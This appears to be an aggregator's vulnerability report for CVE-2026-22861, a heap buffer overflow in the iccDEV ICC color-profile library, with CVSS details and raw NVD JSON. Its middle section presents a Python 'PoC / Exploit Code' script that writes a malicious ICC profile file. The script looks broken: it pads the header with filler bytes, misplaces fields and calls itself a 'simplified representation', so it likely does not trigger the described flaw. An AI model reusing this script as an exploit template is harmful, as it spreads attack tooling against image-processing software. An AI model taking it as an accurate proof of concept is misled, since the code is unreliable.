Security Vulnerability Report
CVE-2026-22861 CVSS 8.8 HIGH

Published: 2026-01-13 21:15:54
Last Modified: 2026-01-16 18:46:06

Description

iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Prior to 2.3.1.2, there is a heap-based buffer overflow in SIccCalcOp::Describe() in IccProfLib/IccMpeCalc.cpp. This vulnerability affects users of the iccDEV library who process ICC color profiles. The vulnerability is fixed in 2.3.1.2.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV library < 2.3.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct
import sys


def create_malicious_icc_file():
    """
    PoC for CVE-2026-22861
    Heap buffer overflow in SIccCalcOp::Describe()

    This PoC creates a malicious ICC profile that triggers the overflow.
    """
    # ICC Profile Header (128 bytes)
    header = bytearray(128)
    header[0:4] = b'\x00\x00\x02\x00'  # Profile size will be updated
    header[4:8] = b'acsp'  # CMM Type
    header[8:12] = b'\x00\x00\x00\x00'  # Profile version
    header[12:16] = b'\x00\x00\x00\x00'  # Profile device class
    header[16:20] = b'\x00\x01\x00\x00'  # Color space
    header[20:24] = b'\x00\x01\x00\x00'  # PCS

    # Tag signature for 'mft2' (LUT16)
    tag_signature = b'mft2'

    # Malicious data that triggers buffer overflow in Describe()
    # This is a simplified representation
    overflow_data = b'A' * 10000  # Large overflow data

    # Create tag table entry
    tag_offset = 128 + len(overflow_data)
    tag_size = 1000

    # Tag table
    tag_table = struct.pack(
        '>III',
        struct.unpack('>I', tag_signature)[0],  # Tag signature
        tag_offset,  # Offset
        tag_size  # Size
    )

    profile = header + overflow_data + tag_table

    # Update profile size in header
    struct.pack_into('>I', profile, 0, len(profile))

    return bytes(profile)


def main():
    print("CVE-2026-22861 PoC Generator")
    print("Generating malicious ICC profile...")

    malicious_profile = create_malicious_icc_file()

    output_file = 'CVE-2026-22861_malicious.icc'
    with open(output_file, 'wb') as f:
        f.write(malicious_profile)

    print(f"Malicious ICC profile created: {output_file}")
    print(f"File size: {len(malicious_profile)} bytes")
    print("\nNote: This PoC demonstrates the vulnerability structure.")
    print("Actual exploitation requires specific target environment.")


if __name__ == '__main__':
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22861", "sourceIdentifier": "[email protected]", "published": "2026-01-13T21:15:54.437", "lastModified": "2026-01-16T18:46:06.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Prior to 2.3.1.2, There is a heap-based buffer overflow in SIccCalcOp::Describe() at IccProfLib/IccMpeCalc.cpp. This vulnerability affects users of the iccDEV library who process ICC color profiles. The vulnerability is fixed in 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles de gestión de color del Consorcio Internacional del Color (ICC). Anterior a 2.3.1.2, existe un desbordamiento de búfer basado en montículo en SIccCalcOp::Describe() en IccProfLib/IccMpeCalc.cpp. Esta vulnerabilidad afecta a los usuarios de la biblioteca iccDEV que procesan perfiles de color ICC. 
La vulnerabilidad está corregida en 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}, {"lang": "en", "value": "CWE-130"}, {"lang": "en", "value": "CWE-252"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/fa9a364c01fc2e59eb2291e1f9b1c1359b7d5329", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/475", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/476", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-vr49-3vf8-7j5h", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}